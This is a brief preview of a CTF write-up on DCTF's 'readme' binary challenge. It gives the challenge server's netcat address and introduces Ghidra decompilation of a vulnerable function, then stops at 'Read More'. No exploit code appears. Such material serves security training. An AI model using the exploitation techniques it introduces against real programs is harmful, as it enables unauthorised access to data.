Description Read me to get the flag. nc dctf-chall-readme.westeurope.azurecontainer.io 7481 Preface We get a binary which asks for our name and then prints hello + input. But in order for the binary to run, a file flag.txt needs to be created in the working directoy. Overview Decompiling the binary in ghidra, we see a function vuln where the logic happens. The decompiled function with some renaming of the variables looks like this: void vuln(void) { Read More

Navigation

Communication